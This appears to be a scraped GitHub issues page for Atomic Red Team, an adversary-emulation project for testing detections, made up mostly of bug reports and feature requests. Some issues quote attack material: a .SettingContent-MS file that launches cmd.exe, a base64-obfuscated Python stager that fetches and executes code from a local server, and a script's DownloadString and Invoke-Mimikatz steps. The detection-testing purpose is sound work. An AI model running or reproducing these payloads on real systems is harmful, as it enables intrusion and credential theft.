redcanaryco / atomic-red-team Goto Github PK
View Code? Open in Web Editor NEWSmall and highly portable detection tests based on MITRE's ATT&CK.
License: MIT License
Small and highly portable detection tests based on MITRE's ATT&CK.
License: MIT License
Currently the execution frameworks are not intuitive to help guide someone new to Atomic to know where to begin to run tests.
So perhaps we need to add a quick pointer to each framework with a brief description.
Clicking on any of the links in the home page literally does nothing lol. Specifically of value: Quick Start: Using Atomic Red Team to test your security
Slack channel does not allow users to join: Contact the workspace administrator for an invitation
Seems like a great project and everything, but the documentation is literally nonexistant and so there is no way to use it. Sad.
Example of .SettingContent-MS soon to be added to the ATT&CK Matrix
<?xml version="1.0" encoding="UTF-8"?> <PCSettings> <SearchableContent xmlns="http://schemas.microsoft.com/Search/2013/SettingContent"> <ApplicationInformation> <AppID>windows.immersivecontrolpanel_cw5n1h2txyewy!microsoft.windows.immersivecontrolpanel</AppID> <DeepLink>%windir%\system32\cmd.exe /c calc.exe</DeepLink> <Icon>%windir%\system32\control.exe</Icon> </ApplicationInformation> <SettingIdentity> <PageID></PageID> <HostID>{12B1697E-D3A0-4DBC-B568-CCF64A3F934D}</HostID> </SettingIdentity> <SettingInformation> <Description>@shell32.dll,-4161</Description> <Keywords>@shell32.dll,-4161</Keywords> </SettingInformation> </SearchableContent> </PCSettings>
References:
https://gist.github.com/enigma0x3/b948b81717fd6b72e0a4baca033e07f8
https://enigma0x3.net/2018/06/11/the-tale-of-settingcontent-ms-files/
I moved removed the LD_PRELOAD test out of the rootkit technique. I believe this is better described in T1055 Process Injection
This is a note for me to fix this when I have time.
With the current directory structure, any techniques that work on Windows, Mac, and Linux must be duplicated. This is cumbersome for when one of them changes, as then the other two must also be changed in the same way.
This could be addressed by making a Common
directory which contains cross-platform resources. The READMEs in each of the OS-specific directories could then link back to resources in the Common
directory.
Unsure if a PR would be better, but I wanted to possibly contribute a new execution framework that is an Ansible plugin.
https://github.com/tuckner/ansible-art
The plugin would be a part of Ansible's software package but would execute atomic techniques across Windows & Linux.
There appears to be a bug in the Get-AtomicTechnique
Get-AtomicTechnique -Path .\atomics\T1117\T1117.yaml
Handles NPM(K) PM(K) WS(K) CPU(s) Id SI ProcessName
325 19 7604 25452 0.56 5652 1 ApplicationFrameHost
158 10 6332 11480 0.73 9048 0 audiodg
329 16 5212 20804 0.06 8380 1 backgroundTaskHost
174 11 2048 8140 0.03 736 1 chrome
142 11 1972 8780 0.03 5896 1 chrome
I expected to create a test.
The current state, it runs Get-Process and dies.
Windows 10 x64 v1803
@rickardja if you have a chance can you check the code for the Get-AtomicTechnique method, or perhaps we need to update the documentation. Thanks!
https://github.com/hfiref0x/UACME
Might be worth including those in your UAC testing suite.
Atomic Test #13 - wbadmin
"wbdadmin delete catalog -quiet" is not working.
wbdadmin should be wbadmin instead.
OS: Windows10 Enterprise.
Hi, when executing a test in a windows system I get a failure on test report creation because the script tries to create a file with an invalid name:
` - Writing results to atomic-test-executor-execution-2018-08-29T20:55:26Z.yaml
FATAL ERROR: Invalid argument @ rb_sysopen - atomic-test-executor-execution-2018-08-29T20:55:26Z.yaml`
Is there a possibility of adding a JSON output of the current Markdowns?
I have made an attempt using md_to_json via: pip install markdown_to_json
However the tool (md_to_json) itself isn't properly suited. So there has been some modification to the layout of the markdowns to get the expected output.
linked from https://github.com/redcanaryco/atomic-red-team/tree/master/Windows
is 404
it should be
Presently, each test is fairly static.
A recent presentation by @danielbohannon and @matthewdunwoody
https://www.slideshare.net/DanielBohannon2/signaturesaredead-long-live-resilient-signatures
Serve as a reminder that tests need to be more dynamic, less defenders get complacent with curent detections.
I propose some sort of dynamic configuration file that can be applied to a test. To change things like file name, command line arguments, etc...
Open to feedback. Just wanted to track as an issue to come back to when we have time.
I think this test should create a share then delete it. For completeness
atomic-red-team/atomics/T1002/T1002.yaml
while scanning an alias
in "", line 34, column 16:
default: *.docx
^
expected alphabetic or numeric character, but found '.'
in "", line 34, column 17:
default: *.docx
^
I bit of googling suggests if you want to have * at the beginning you will need to put it quotes
This test case, the linux test is missing the test prologue.
This causes a parsing error "Duplicate Key" when parsing the yaml
https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1074/T1074.yaml#L91
After further review. T1074 is a complete mess. Needs reworked for both PowerShell and LInux last 2 tests
When you download the Atomic Repo, Windows will block many scripts. This is a normal default mechanism to prevent some material from the internet from executing.
In order to over come this, perhaps we can add this to our Invoke-AtomicRedTeam module.
Get-ChildItem -Path 'C:\AtomicRedTeam' -Recurse | Unblock-File
A question was posed in the Atomic Channel about checking wether or not a test requires admin (Windows ) or root privileges.
I support this idea. Just need to think through where to put that check.
Update validation scripts
Retroactively update existing tests to have this added to all the existing test.
Create a simple test to create and execute 3-4 tests.
Use case: Someone just wants a quick way to run Atomic Red Team.
T1086 Atomic Test #6 is false,The correct way is first execution $Password = Read-Host -AsSecureString,Then execution New-LocalUser -FullName 'full_name' -Name 'user_name' -Password $password -Description 'description'
and the true is Run it with powershell,not Run it with command_prompt,Your introduction is wrong.
ℹ Please replace this with what you did.
New-LocalUser -FullName 'full_name' -Name 'user_name' -Password $password -Description 'description'
ℹ Please replace this with what you expected to happen.
Successfully created an account
ℹ Please replace this with of what happened instead.
error info:
New-LocalUser : 无法绑定参数“Password”。无法将“System.String”类型的“password”值转换为“System.Security.SecureStri
ng”类型。
Which specific operating system are you running (e.g. Windows 7 SP1 32-bit)?
win10 1709
Did you run the test from an elevated or root prompt?
yes
If relevant, which atomic test is this specific to?
T1086 Atomic Test #6
If relevant, which execution harness are you attempting to use?
powershell
Run https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056/Get-Keystrokes.ps1
Script ¿should? log keystrokes at key.log
nothing
As reported in the Atomic Slack Chanel, Test T1122 COM hijack needs a new CLSID.
{372FCE38-4324-11D0-8810-00A0C903B83C} is no longer viable.
Probably the best plan forward is to just rewrite this test to look for reg mods of existing CLSIDs
references:
https://www.cyberbit.com/blog/endpoint-security/com-hijacking-windows-overlooked-security-vulnerability/
https://www.endgame.com/blog/technical-blog/how-hunt-detecting-persistence-evasion-com
T1099
the target_filename input parameter does not have a default value.
Thanks
Sometimes we use powershell, powershell.exe and sometimes nothing.
We need to review each powershell test and choose a consistent pattern.
Compare 1086, 1050 and 1098 for examples.
Afternoon
I have been using msxsl.exe lately and its been quite effective. I looked through all your red team stuff and couldn't find it. Below are some references for you, maybe you can add it to your lists.
Anyways food for thought.
I have a problem with this technique. I tested DLL(Win32/x64) files using Mavinject command but ain't working right. I used notepad.exe for ProcessID and also, disabled my anti-virus solution. Got any suggestions?
For every reg.exe add, you need a reg.exe delete to clean up the target system.
The Following Techniques Need to Be Corrected.
1042
1053
1065
1075
1103
1124
1191
There are inconsistencies in the input_arguments and the command property.
Example: T1042
---
attack_technique: T1042
display_name: Change Default File Association
atomic_tests:
- name: Change Default File Association
description: |
Change Default File Association From cmd.exe
supported_platforms:
- windows
input_arguments:
extension_to_change:
description: File Extension To Hijack
type: String
default: .wav
target_exenstion_handler: <<<<<<<< THIS SHOULD MATCH
description: Thing To Open
type: Path
default: C:\Program Files\Windows Media Player\wmplayer.exe
executor:
name: command_prompt
command: |
cmd.exe assoc #{extension_to_change}="#{thing_to_execute}" <<<<<< THIS
target_extension_handler s/b renamed to thing_to_execute Or vice versa
My recommendation is once we fix these that the validation routine be updated to check this.
As discussed in the Channel it would be great to have a the ability to check a dependency is on the box you are running the test from. For example LOLbins such as mavinject (T1055). In my testing (Win10 Enterprise x64) this is not always installed by default unless you have installed a click to run MS installer.
In reviewing this page:
https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/linux-index.md
I found that nearly all the Lateral Movement tests (as well as others on the page) are pointed to a dead link:
https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTING.md
Once all url references are fixed we can merge this branch
https://github.com/redcanaryco/atomic-red-team/tree/Discovery
example:
atomic-red-team/atomics/T1074/T1074.yaml
Line 16 in 7aa0e28
S/b updated to
https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ARTifacts/Misc/Discovery.bat
Hi All,
Please forgive my newbie-ness, if this is not the correct forum for this idea or if the functionality I’m explaining below doesn’t already exist, please let me know. I noticed the “Generate All Tests” code on this page: https://github.com/redcanaryco/atomic-red-team/tree/master/execution-frameworks/Invoke-AtomicRedTeam
I am looking for a simple command to run many or all tests applicable by OS that creates a test report to compare to. I’m thinking there are many people like me who just want to quickly test my shiny new detection method (EDR tool, sysmon setup or SIEM integration) by running one simple command. I’m really hoping the command will output a report. The report can be then used to support a manual comparison to shiny new detection method on a wide scale of techniques post-execution. I think having this functionality easily accessible and documented will be great.
The command should:
• Run a list of tests, all tests by tactic or all tests (default).
• Insert some delay time in between each command execution, perhaps 1 minute default. This will allow for greater confidence in detection when comparing shiny new detection method to test output report.
• *Add command execution validation (Ex/ T1117 did a new instance of calc.exe execute?) Being so new to the framework, I’m assuming not all techniques pop calc.exe.
• Output a CSV or XML report of actions. Report Fields:
• Include techniques with missing tests as “No Atomic Test Available – Please submit a test! https://github.com/redcanaryco/atomic-red-team/blob/master/docs/contributing.md#how-to-contribute” in output
• Summary: Number of tests completed/successful, failed, not applicable, missing tests (by tactic and total)
• Can be user interactive or non-interactive to bypass prompts
Questions for community:
I noticed the code Invoke-AtomicRedTeam\Public\Invoke-AtomicTest.ps1
has a “foreach ($technique in $AtomicTechnique)” and “foreach ($test in $technique.atomic_tests)” loops but it is not intuitive to how to run and I don’t see a report output option. See #432
Thank you!
Example: T1002
https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1002/T1002.yaml
input arguments are:
input_arguments:
input_file:
description: Path that should be compressed into our output file
type: Path
default: C:\*
the input_file variable then contains the following based on parsing the yaml:
{'description': 'Path that should be compressed into our output file', 'type': 'Path', 'default': 'C:\\*'}
command then takes:
executor:
name: powershell
command: |
dir #{input_file} -Recurse | Compress-Archive -DestinationPath #{output_file}
thus you are passing a dict to the command part
i assume it should be something like #{input_file.default} or #{input_file['default']} whatever makes sense here
https://attack.mitre.org/wiki/Technique/T1036
Can be achieved by copying one process to have the filename of a Windows system process for execution. Essentially impersonating a Windows system process.
We identified that the matrices were out of date (missing T1220, for example) and it is possibly caused by the ATT&CK API change.
We need to create a NuGetApiKey for publishing Invoke-AtomicRedTeam to powershellgallery.com. This also requires an update for circleci YAML.
Per Josh Rickard (MSAdministrator), he's provided an example AppVeyor configuration for this:
https://github.com/MSAdministrator/PSNamedPipe/blob/master/appveyor.yml
T1127 MSBuild Bypass Using Inline Tasks Test needs path pointing to src
Currently just has file name
https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1127/T1127.yaml#L14
Should be relative or full path
Validation script errors on /atomic_red_team/atomic_test_template.yaml
Suggested Fix:
Create an Exclusion for that file.
@brianebeyer thoughts?
Example Output:
Validating ./atomic_red_team/atomic_test_template.yaml...FAIL
atomic_tests[0].name
contains a TODO
The example test on the main page does not work. The URL seems to be case-sensitive, and instead of:
https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/t1117/RegSvr32.sct
it should be
https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1117/RegSvr32.sct
(Tested on Windows 7)
https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1122/T1122.yaml
This is the completely wrong test.
Ran test T1155 and got this error, -sh: syntax error near unexpected token `'ignore''
osascript "do shell script "echo "import sys,base64,warnings;warnings.filterwarnings('ignore');exec(base64.b64decode('aW1wb3J0IHN5cztpbXBvcnQgcmUsIHN1YnByb2Nlc3M7Y21kID0gInBzIC1lZiB8IGdyZXAgTGl0dGxlXCBTbml0Y2ggfCBncmVwIC12IGdyZXAiCnBzID0gc3VicHJvY2Vzcy5Qb3BlbihjbWQsIHNoZWxsPVRydWUsIHN0ZG91dD1zdWJwcm9jZXNzLlBJUEUpCm91dCA9IHBzLnN0ZG91dC5yZWFkKCkKcHMuc3Rkb3V0LmNsb3NlKCkKaWYgcmUuc2VhcmNoKCJMaXR0bGUgU25pdGNoIiwgb3V0KToKICAgc3lzLmV4aXQoKQppbXBvcnQgdXJsbGliMjsKVUE9J01vemlsbGEvNS4wIChXaW5kb3dzIE5UIDYuMTsgV09XNjQ7IFRyaWRlbnQvNy4wOyBydjoxMS4wKSBsaWtlIEdlY2tvJztzZXJ2ZXI9J2h0dHA6Ly8xMjcuMC4wLjE6ODAnO3Q9Jy9sb2dpbi9wcm9jZXNzLnBocCc7cmVxPXVybGxpYjIuUmVxdWVzdChzZXJ2ZXIrdCk7CnJlcS5hZGRfaGVhZGVyKCdVc2VyLUFnZW50JyxVQSk7CnJlcS5hZGRfaGVhZGVyKCdDb29raWUnLCJzZXNzaW9uPXQzVmhWT3MvRHlDY0RURnpJS2FuUnhrdmszST0iKTsKcHJveHkgPSB1cmxsaWIyLlByb3h5SGFuZGxlcigpOwpvID0gdXJsbGliMi5idWlsZF9vcGVuZXIocHJveHkpOwp1cmxsaWIyLmluc3RhbGxfb3BlbmVyKG8pOwphPXVybGxpYjIudXJsb3BlbihyZXEpLnJlYWQoKTsKSVY9YVswOjRdO2RhdGE9YVs0Ol07a2V5PUlWKyc4Yzk0OThmYjg1YmQ1MTE5ZGQ5ODQ4MTJlZTVlOTg5OSc7UyxqLG91dD1yYW5nZSgyNTYpLDAsW10KZm9yIGkgaW4gcmFuZ2UoMjU2KToKICAgIGo9KGorU1tpXStvcmQoa2V5W2klbGVuKGtleSldKSklMjU2CiAgICBTW2ldLFNbal09U1tqXSxTW2ldCmk9aj0wCmZvciBjaGFyIGluIGRhdGE6CiAgICBpPShpKzEpJTI1NgogICAgaj0oaitTW2ldKSUyNTYKICAgIFNbaV0sU1tqXT1TW2pdLFNbaV0KICAgIG91dC5hcHBlbmQoY2hyKG9yZChjaGFyKV5TWyhTW2ldK1Nbal0pJTI1Nl0pKQpleGVjKCcnLmpvaW4ob3V0KSkK'));" | python &""
Atomic test T1155 executes
-sh: syntax error near unexpected token `'ignore''
MacOS High Sierra version 10.13.6
https://github.com/redcanaryco/atomic-red-team/blob/yaml-cs/atomics/T1002/T1002.yaml
If i'm reading the the various yaml's correctly you are setting the executor: powershell
and then NOT specifying the executor in the command. looks like you just have a rogue powershell.exe in this one
Run 'chain_reaction_DragonsTail.ps1'
Receive all SUCCESS notifications
PS C:\Users<redacted>\Desktop> .\chain_reaction_DragonsTail.ps1
SUCCESS: The scheduled task "Atomic Testing" has successfully been created.
SUCCESS: Attempted to run the scheduled task "Atomic Testing".
SUCCESS: The scheduled task "Atomic Testing" was successfully deleted.
powershell.exe : Exception calling "DownloadString" with "1" argument(s): "The remote server returned an error: (404) Not Found."
At C:\Users<redacted>\Desktop\chain_reaction_DragonsTail.ps1:21 char:1
+ CategoryInfo : NotSpecified: (Exception calli...04) Not Found.":String) [], RemoteException
+ FullyQualifiedErrorId : NativeCommandError
At line:1 char:1
+ CategoryInfo : NotSpecified: (:) [], MethodInvocationException
+ FullyQualifiedErrorId : WebException
Invoke-Mimikatz : The term 'Invoke-Mimikatz' is not recognized as the name of a cmdlet, function, script file, or operable program. Check the spelling of the name, or if a path was included, verify that the path is correct and try again.
At line:1 char:157
~~~~~~~~~~~~~~~
Windows 10 64-bit
https://github.com/redcanaryco/atomic-red-team/blob/master/ARTifacts/Chain_Reactions/chain_reaction_DragonsTail.bat
Callouts to this repo for binaries result in 404.
I think each test needs to provide a cleanup mechanism. We can decide whether to include that in the executor.command. or as a seperate yaml property.
Example: T1050 Creates a Service, but makes no attempt to clean up.
I proposes for T1050 something like this.
sc.exe create
sc.exe start
sc.exe stop
sc.exe delete
To be complete each test should stand alone.
I think this is best practice. @brianebeyer , I would be interested in your thoughts here.
The use of a tag with a release would facilitate the integration of atomic red team in Kali, see https://bugs.kali.org/view.php?id=4525
Related Github doc: https://help.github.com/articles/about-releases/
Thanks!
I think T1126.yaml needs to be adjusted, the YAML file has two top level "atomic_tests" nodes instead of one.
per request moving this over from twitter
ref:
https://twitter.com/carnal0wnage/status/994594132747317248
CG
are you guys planning to support multiple commands in in a single command item? T1105.yaml has multiple commands. perhaps they could each be an element in a list (like you are doing supported_platforms). right now you'd/I have to account for # and blank lines
BB
Take a look at https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/t1089/t1089.yaml … - isn’t completely in line with new spec yet but you’ll see the command is multiline.
Our thought was “write your commands like you’d write them in a bat/powershell/sh script and executors can invoke them as if a single script”
CG
hmmm how do you anticipate the executor invoking those? taking the blob and writing to a file and exec'ing? how would i exec all that if i only had ssh?
BB
For ssh, I think a heredoc works. Imagine the ssh+bash executor doing
ssh user@host bash <<'EOF'
<< the contents of the executor.command >>
EOF
A declarative, efficient, and flexible JavaScript library for building user interfaces.
🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.
TypeScript is a superset of JavaScript that compiles to clean JavaScript output.
An Open Source Machine Learning Framework for Everyone
The Web framework for perfectionists with deadlines.
A PHP framework for web artisans
Bring data to life with SVG, Canvas and HTML. 📊📈🎉
JavaScript (JS) is a lightweight interpreted programming language with first-class functions.
Some thing interesting about web. New door for the world.
A server is a program made to process requests and deliver data to clients.
Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.
Some thing interesting about visualization, use data art
Some thing interesting about game, make everyone happy.
We are working to build community through open source technology. NB: members must have two-factor auth.
Open source projects and samples from Microsoft.
Google ❤️ Open Source for everyone.
Alibaba Open Source for everyone
Data-Driven Documents codes.
China tencent open source team.